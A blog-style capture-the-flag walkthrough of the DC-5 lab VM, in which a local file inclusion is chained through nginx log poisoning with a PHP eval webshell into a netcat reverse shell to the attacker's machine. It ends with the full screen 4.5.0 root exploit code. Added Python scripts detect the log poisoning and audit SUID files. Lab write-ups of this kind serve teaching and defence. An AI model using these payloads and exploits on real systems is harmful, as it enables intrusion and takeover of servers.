DC-5 lab machine penetration test: installation and flag-capture walkthrough (step-by-step for beginners)

# Download and install process

Download link: https://pan.baidu.com/s/1IyhlH4k-fcz6ze6TscUYJg?pwd=ibiy
Extraction code: ibiy

1. Turn on the VM

Click "Retry" when prompted.

Change the network adapter from bridged mode to NAT.

Click to start the virtual machine.

Choose "Yes" when prompted.

Seeing the login prompt means the machine booted successfully.

1. Information collection

(1) Use nmap to determine the IP address of the DC-5 host

nmap -sP 192.168.222.0/24

Since my network segment is 222, I use nmap -sP 192.168.222.0/24 to scan the whole segment for live hosts.

Use your own segment: if your machines are on 192.168.111.xxx, scan 192.168.111.0/24, and so on.

Because DC-5 was the machine started most recently, DHCP usually gives it the highest address in the range. The highest address here is 185, so my initial guess is that DC-5 is at 192.168.222.185.

(2) Port scan 192.168.222.185

nmap -sV 192.168.222.185

This runs a service/version scan against the IP address.

Ports 80 and 111 are open.

Port 80 is obviously the web service, so we can browse to it directly.

Why do we not go after port 111 here?

Because I was very excited when I first saw port 111. After a series of tests, I found that port 111 was just a decoy, so don't go there.

(3) Visit 192.168.222.185:80

After looking at the first four pages, nothing suspicious or usable was found.

Moving on to the fifth page, we find a form.

Enter some data and submit it.

It turns out that the page redirects to thankyou.php and passes the values we just entered as parameters.

Since parameters are being passed, and this is a place where data is exchanged with the server, I wondered whether there might be SQL injection or XSS here.

XSS requires another party to trigger it, which we cannot arrange here, so I chose SQL injection. I first ran sqlmap against it and found nothing. I then tested manually and still found no injection. But while testing manually I noticed something: one spot on the page kept changing, and it changed every time I submitted the form.

(4) Submit the form; the "Copyright © 2020" line keeps changing

First submission:

Below, the footer shows Copyright © 2018.

Submit a second time:

After the second submission the footer shows Copyright © 2019.

So where does this Copyright © 2019 come from? Why does it change?

Look at the following picture.

1. The green part is usually called the header or navigation bar.

2. The yellow part is called the content.

3. The blue part is called the footer.

4. On many sites the navigation bar and footer are written once and included in every other page, because they are the same everywhere: if I have 10 pages, all 10 share the same footer and navbar.

5. In that case developers write these two pieces in advance. The navigation bar is usually named something like head.php or nav.php, and the footer footer.php or foot.php. What it is actually called here, we will have to guess.

If the overall page is called thankyou.php, how would this be done in code?

Look at the following pictures.

Suppose we are writing thankyou.php and the navigation bar and footer already exist. A developer will normally pull them in with include: if the navigation bar is head.php, the code says include('head.php'); if the footer is foot.php, it says include('foot.php'). The navigation bar and footer then do not have to be rewritten, just included. This is still only a guess, but it is how code is reused: file inclusion.

When we refresh the page, we see that this spot keeps changing.

If the footer were hard-coded, say as "Copyright © 2017", it would not keep changing between 2017 and 2020 and so on. Judging from the page's behaviour, it is highly likely that there is something like include('foot.php') at the bottom. We do not know whether the file at the end of the page is called foot.php, footer.php or something else; that it is an included file is still only my suspicion, to be confirmed by trying.

If the include takes its file name from a parameter, how would that parameter be written? Typically as thankyou.php?file=foot.php. Both file and foot.php are assumed names here: file is the hypothetical key name and foot.php the hypothetical value. If the page really works like thankyou.php?file=foot.php, then foot.php is the value passed in and it gets included. So a file parameter may be passed here, and if it is, things become easy: there would be a file inclusion vulnerability. All of this is still guesswork, and whether the site actually does what we assume has to be tested. The next step is to guess the file name of the footer file.

(5) Use the Yujian background scanner or dirsearch to enumerate the directory

See: Installation and use of dirsearch (Programmer Sought)

Command:

python dirsearch.py -u <your DC-5 IP address>

(My system crashed in the afternoon and the IP was reassigned, so I am afraid some beginners would otherwise be confused; I note it here. Yujian, as I just found out, is no longer available. You can install it yourself, or just use dirsearch. I use both for double insurance, to see whether one finds something the other missed.)

Note that it found a footer.php. Visit it.

Refresh the page again: it changes in the same way as the footer of thankyou.php.

So footer.php is probably included by the thankyou.php file, and the file name can be passed in as a parameter.

We now know the path and file name, i.e. the value, but still nothing about the key name.

URL composed of the known information:

thankyou.php?xxx=footer.php

So the next step is to guess the key name xxx.

(6) Guess the key name manually or with a fuzzer.

Using the fuzzer that ships with Kali:

First we need a file that is known to exist on this site, such as index.php or solutions.php.

I already know that the key name is file.

http://192.168.189.129/thankyou.php?file=index.php

First visit this URL.

This is the thankyou.php page; the key name is file and the value is index.php.

The point of index.php is that it is a file that certainly exists. If the include is vulnerable, index.php will definitely be included.

Look at the picture: the green part is the original thankyou.php page and the red part is the index.php page. How did that appear? Through http://192.168.189.129/thankyou.php?file=index.php, where the parameter is passed in and the code of the home page index.php is executed inside thankyou.php and rendered there.

Given that we know the key name is file above, what if we did not know it?

Use the wfuzz tool that comes with Kali.

Open Kali and type wfuzz in a terminal.

The placeholder keyword is FUZZ.

If an error is reported here, switch to root and try again.

Command:

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.189.129/thankyou.php?FUZZ=index.php

wfuzz: the program
-w: specify the wordlist file

/usr/share/wfuzz/wordlist/general/common.txt: this file ships with the system, just use it

http://192.168.189.129: the IP address you set for DC-5

thankyou.php?FUZZ=index.php: index.php is a file known to exist in the site directory. The keyword FUZZ stands for the unknown part; the entries of the wordlist /usr/share/wfuzz/wordlist/general/common.txt are substituted at the position of FUZZ one after another. If this is still unclear, think of FUZZ as the variable you mark in Burp Suite (bp), and /usr/share/wfuzz/wordlist/general/common.txt as the wordlist you choose for the brute force.

Look at the result: one response clearly differs from all the others, so the key name is file.

Alternatively, use wfuzz's wordlist with Burp Suite (bp):

Copy the wfuzz wordlist.

Open bp, browse to the URL and capture the request.

Send it to the Intruder module.

Mark the parameter name position as the payload variable.

Load the wordlist you just copied.

Click Start.

Manual approach:

Parameter names that commonly carry file inclusion vulnerabilities:

?file=

?filename=

?home=

?path=

?page=

We can test these common key names one by one.

Say I try ?file. Then the test URL is:

http://192.168.189.129/thankyou.php?file=footer.php

This confirms that the key name is file.

2. Exploitation begins

(1) Use the file inclusion vulnerability to read /etc/passwd

URL: http://192.168.189.129/thankyou.php?file=/etc/passwd

This means we can now read the user list on the server through the file inclusion.

But reading information is not enough; our goal is to control the box with a webshell tool, and there is no upload function anywhere on the site. So what can we do? Think back to information collection: the server is nginx. Whether the server is nginx or Apache, it writes logs, and the logs have a default path: nginx uses /var/log/nginx/access.log, Apache /var/log/apache/access.log. As long as the default has not been changed, we can read the log through the inclusion, either access.log or error.log.

So what is the access log good for, and what does it have to do with getting a webshell?

If we request a page that does not exist, a 404 is returned and the request is recorded in access.log. We can use that: request a deliberately wrong path with a line of code appended, for example http://xxxx/ok<?php @eval($_POST['x'])?>. The whole request, including ok<?php @eval($_POST['x'])?>, is written into the log. Since the log lives on the server and we can include it, the PHP code inside it is parsed when the log is included, and the backdoor is in place.

Note:

Whether you include /var/log/nginx/access.log or /var/log/nginx/error.log, bear in mind what each contains. access.log records every request, whatever the status (200, 404, 306 and so on), so for the webshell you can request a non-existent file with the one-line Trojan appended, for example http://xxxx/wsxcwe<?php @eval($_POST['x'])?>, and it is parsed when you include /var/log/nginx/access.log. If instead you want it to land in /var/log/nginx/error.log, you have to request an existing file, for example http://xxxx/thankyou.php?xx<?php @eval($_POST['x'])?>, and the record you wrote appears in /var/log/nginx/error.log.
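The two techniques described above, reading files through thankyou.php?file=... and writing a PHP one-liner into the nginx access log, both leave traces in that same log. The following script is an added example for defenders (not part of the original post): it parses nginx combined-format log lines and flags both patterns. The log lines and parameter list are constructed samples, not real DC-5 output.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# nginx "combined" format, the default log_format in nginx.conf
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Parameter names commonly fed to include() (the manual list in the post).
INCLUDE_PARAMS = {"file", "filename", "home", "path", "page"}
# Values that only make sense if the parameter really reaches include()/fopen().
SENSITIVE_PREFIXES = ("/etc/", "/var/log/", "/proc/")
PHP_TAG_RE = re.compile(r"<\?(php|=)|\?>", re.IGNORECASE)

# Constructed sample log (not real DC-5 data): one benign include, two LFI
# probes (the second URL-encoded), one log-poisoning attempt, one benign hit.
SAMPLE_LOG = """\
192.168.222.10 - - [10/Aug/2023:10:01:02 +0000] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.222.10 - - [10/Aug/2023:10:01:09 +0000] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.222.10 - - [10/Aug/2023:10:01:15 +0000] "GET /thankyou.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.222.10 - - [10/Aug/2023:10:02:30 +0000] "GET /ok<?php @eval($_POST['x'])?> HTTP/1.1" 404 162 "-" "Mozilla/5.0"
192.168.222.11 - - [10/Aug/2023:10:03:00 +0000] "GET /solutions.php HTTP/1.1" 200 3000 "-" "curl/7.88.1"
"""


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["target"] = parts[1] if len(parts) > 1 else ""
    return rec


def classify(line):
    """Return the findings for one log line (empty list means nothing suspicious)."""
    rec = parse_line(line)
    if rec is None:
        return ["unparseable"]
    findings = []
    # parse_qs decodes %2F etc., so encoded traversal is inspected in clear text.
    query = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    for name, values in query.items():
        if name.lower() not in INCLUDE_PARAMS:
            continue
        for v in values:
            if "../" in v or v.startswith(SENSITIVE_PREFIXES):
                findings.append(f"lfi-probe:{name}={v}")
    # A PHP tag in the request line or User-Agent is never legitimate traffic;
    # decode first so an encoded (and therefore failed) attempt is still reported.
    if PHP_TAG_RE.search(unquote(rec["request"])) or PHP_TAG_RE.search(rec["ua"]):
        findings.append("log-poisoning")
    return findings


def scan(lines):
    """Return (ip, status, findings) for every suspicious line, in log order."""
    hits = []
    for line in lines:
        findings = classify(line)
        if findings:
            rec = parse_line(line) or {"ip": "?", "status": "?"}
            hits.append((rec["ip"], rec["status"], findings))
    return hits
```

Run scan(SAMPLE_LOG.splitlines()) to see the three flagged requests; feeding the real /var/log/nginx/access.log through the same function gives the same kind of report, and a 404 paired with "log-poisoning" is exactly the trace the procedure above leaves behind.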

(2) Check whether the default log path is in use

URL: http://192.168.189.129/thankyou.php?file=/var/log/nginx/access.log

The page shows that the default log path has not been changed: the log contents are returned to us.

(3) Write the one-line Trojan

Turn on Burp packet capture and send the request.

Note: do not type the one-liner directly into the browser's URL bar, or it will be URL-encoded!

Intercept the request in Burp and write the line of code into it there!!!

(4) Include the log file

At this point the one-line Trojan has been written into the log. The fact that <?php @eval($_POST['x'])?> is not displayed in the page shows that the code was parsed and executed.

(5) Connect with AntSword

China Chopper (Caidao) is not recommended here because it only runs on Windows, while AntSword is cross-platform. So choose AntSword.

The URL is the address of the log file your Trojan was recorded in: access.log's address if it landed in access.log, error.log's if it landed in error.log.

The password is the parameter name used in the one-liner; I set x, so I enter x.

At this point the connection succeeds and we are in the web directory of the DC-5 machine.

Browse the directories: some can be viewed successfully.

But the root directory cannot be viewed, which suggests we do not have root privileges.

(6) Right-click to open the AntSword terminal and enter the whoami command

Enter whoami.

We find that we are only the web user, not root.

So for now we can only access the web server and what we can do is limited: we are www-data, just the web server user, not root. Since we lack the privileges, we need to escalate and continue into the system.

(7) For convenience, use AntSword to send a reverse shell back to Kali and do the remaining work from there

We connect back to Kali because Kali has more tools.

(8) Start a listener on Kali by entering nc -lvvp 1234 in a terminal

Command: nc -lvvp 1234

This opens port 1234 on Kali and waits for DC-5 to connect to it.

Quick review:

A forward (bind) connection is one where the attacker machine connects to a port listening on the target machine.

A reverse connection is one where the attacker machine listens and waits for the target machine to connect to it. (This is used more often; nc is a reverse connection tool.)

(9) In the AntSword terminal, run nc -e /bin/bash 192.168.189.130 1234

Command: nc -e /bin/bash <your Kali IP address> 1234

If "connect" appears in the listener window, the connection succeeded.

(10) On Kali, enter python -c 'import pty;pty.spawn("/bin/bash")' [start an interactive shell through python]

At this point both Kali and AntSword are connected to DC-5.

Command:

python -c 'import pty;pty.spawn("/bin/bash")'

So what does interactive mean?

It means that whether you enter whoami or id, you get the corresponding output.

Connecting to DC-5 from Kali is the same as connecting through AntSword: the host machine can control DC-5 and so can Kali. Looking only at the command line, the two duplicate each other, so since we already have a terminal in AntSword, why bother with Kali?

Because Kali itself has more attack tools and more comprehensive scripts, while AntSword offers nothing beyond the terminal, so the next steps are done from Kali. Combining the two, our final goal is to obtain administrative (root) privileges on DC-5.

(11) Find files with the SUID bit, which are used for privilege escalation

Command: find / -perm -u=s -type f 2>/dev/null

find / : search the whole filesystem

-perm -u=s : look for files with the SUID permission bit set

-type f : regular files only

2>/dev/null : file descriptor 2 is standard error; /dev/null is the null device, which discards whatever is written to it, so error messages (such as permission denied) are not displayed

The files listed above all have the SUID bit set, so these are the files we work with.
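Defenders run the same search to audit a host. The following Python script is an added example (not part of the original post): it reimplements find / -perm -u=s -type f with os.lstat and diffs the result against a baseline of expected setuid programs. BASELINE and the directory tree built by make_demo_tree() are constructed illustrations, not a complete list for any distribution, so the script runs without root.

```python
import os
import stat
import tempfile

# Constructed baseline of setuid programs a Debian-style host is expected to
# have (illustrative only; build a real one from a known-good install).
BASELINE = {"bin/ping", "bin/su", "usr/bin/passwd", "usr/bin/sudo"}


def find_suid(root):
    """Equivalent of `find ROOT -perm -u=s -type f`: regular files with the setuid bit.

    Directories that cannot be read (the 2>/dev/null case) are skipped silently.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def audit(root, baseline=BASELINE):
    """Report setuid files under root (relative to it) and those not in the baseline."""
    found = [os.path.relpath(p, root) for p in find_suid(root)]
    return {"suid": found, "unexpected": sorted(set(found) - set(baseline))}


def make_demo_tree():
    """Build a constructed mini filesystem: two expected setuid files, one
    unexpected setuid file (the post's /bin/screen-4.5.0) and one normal file."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    files = {
        "bin/ping": 0o4755,
        "usr/bin/passwd": 0o4755,
        "bin/screen-4.5.0": 0o4755,   # setuid but not in the baseline
        "bin/ls": 0o755,              # ordinary executable
    }
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)          # chmod after writing so the bit is kept
    return root


if __name__ == "__main__":
    report = audit(make_demo_tree())
    print("setuid files:", report["suid"])
    print("not in baseline:", report["unexpected"])
```

On a real host call audit("/") as root; anything in "unexpected" (here bin/screen-4.5.0) is what an attacker following this walkthrough would look at first, so it is what to review or remove.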

 

Among these files, we mainly use /bin/screen-4.5.0.

screen is a piece of software with a known vulnerability, and it is installed on DC-5, so we can use the screen installed on DC-5 to escalate privileges.

Why are we sure that screen has a vulnerability?

You can find it by searching online.

(12) Open a new terminal and use the searchsploit tool on Kali to look up the vulnerability in screen 4.5.0

Be careful here! Open a new terminal; do not use the previous terminal (the reverse shell) for this!!!

 

Command: searchsploit screen 4.5.0

Supplement:

searchsploit is a command-line search tool for Exploit-DB that helps us find exploit modules.

Exploit-DB is a vulnerability database. A copy of the database is stored locally in Kali Linux, so the command above can be used to find the required module; it searches all vulnerabilities and shellcodes and works without network access.

The basic usage is searchsploit followed by the software or system that may contain vulnerabilities; it lists the known vulnerabilities and the scripts used to exploit them.
For details, see: Searchsploit usage (Blankup's blog, CSDN)

The entry marked in red is labelled (PoC). A PoC is for verification only: it checks whether the target has the vulnerability but does not exploit it. To exploit, choose the green entry above it, which is an exploit script, 41154.sh; we can use it for the attack. The result of running it against screen 4.5.0 is privilege escalation: we get root privileges on DC-5!

(13) Copy the exploit script to the current directory

Command: searchsploit -m 41154

If the output above appears, the copy succeeded.

(14) View the contents of the 41154.sh file

Command: cat 41154.sh

This is the exploit script for screen.

(14) The copied script cannot be executed as-is, so it has to be split into several files. Create a new file in Kali's root folder named libhax.c and copy the first part of the 41154.sh script into it.

(15) Copy the selected content of the script into the libhax.c file

Contents of libhax.c (first file):

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>   /* declares chmod(); without it gcc only warns */
#include <unistd.h>
/* constructor: runs automatically whenever this library is loaded */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

(16) Save libhax.c with Ctrl+S, then open a terminal window and run the following command

Command: gcc -fPIC -shared -ldl -o libhax.so libhax.c

This produces the shared library file libhax.so.

.so is a library file; -o names the output; the .c file is compiled into a .so file.

If a warning is printed here, ignore it.

Use ls to check.

libhax.so being present means the build succeeded.

This is the first file, generated by compiling the .c file.

(17) Create a new file in Kali's root folder named rootshell.c for the second part of the script

(18) Copy the selected part of the 41154.sh script into the rootshell.c file

(19) In rootshell.c, add the line #include <unistd.h> on the second line and delete the redundant NULL on the penultimate line

Contents of rootshell.c (second file):

#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL);
}

(20) Save and close rootshell.c. In a Kali terminal enter gcc -o rootshell rootshell.c to build the executable

At this point the binary has been built from the .c file.

Command: gcc -o rootshell rootshell.c

(21) Create a new dc5.sh file

(22) Copy the last part of the 41154.sh script into dc5.sh

Paste it into dc5.sh, then Ctrl+S to save and close.

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

To escalate privileges, the three files libhax.so, rootshell and dc5.sh must be uploaded to the DC-5 machine.

(23) Copy the three files libhax.so, rootshell and dc5.sh from Kali to any folder on Windows

Here I put these three files in the root folder. If you run into the following situation,

first copy the three files to Kali's desktop,

then copy them from the desktop to Windows.

(24) Open AntSword, find the /tmp directory and right-click to upload the files

Go to the top of the filesystem (/) and open the tmp directory.

Right-click and choose upload.

Upload the three files.

They are now on the DC-5 machine.

(25) In the Kali reverse shell window, check the files just uploaded by AntSword

Command: ls /tmp

You can also check in the AntSword terminal.

Either way, the three files should appear.

(26) In the Kali reverse shell window, enter the /tmp directory and make dc5.sh executable

Command: cd /tmp

Go into /tmp first.

Command: chmod +x dc5.sh

Add execute permission to dc5.sh.

(27) Execute dc5.sh

Command: ./dc5.sh

A # prompt means success.

Points to note:

When I did this I kept getting an error along the lines of /lib64/libc.so.6: version `GLIBC_2.XX' not found. I did it four times from start to finish and always thought something was wrong. The first and second time I used the 2022 version of Kali and got this error; then I switched to the 2023 version and still had it. Only on the fourth attempt, with the 2021 version of Kali, did it run normally.

So if this problem occurs for you (the message means the binaries were linked against a newer glibc than the one installed on DC-5), switch to the 2021 version of Kali. Also note that after switching to Kali 2021, log in directly as root for the experiment!

(28) Go to the root directory of the DC-5 machine to find the flag

Command: cd /root

Switch to the root directory.

View the file thisistheflag.txt.

Command: cat thisistheflag.txt

Seeing the output above means success: you have captured the flag!!!


Source: blog.csdn.net/m0_72755466/article/details/131990636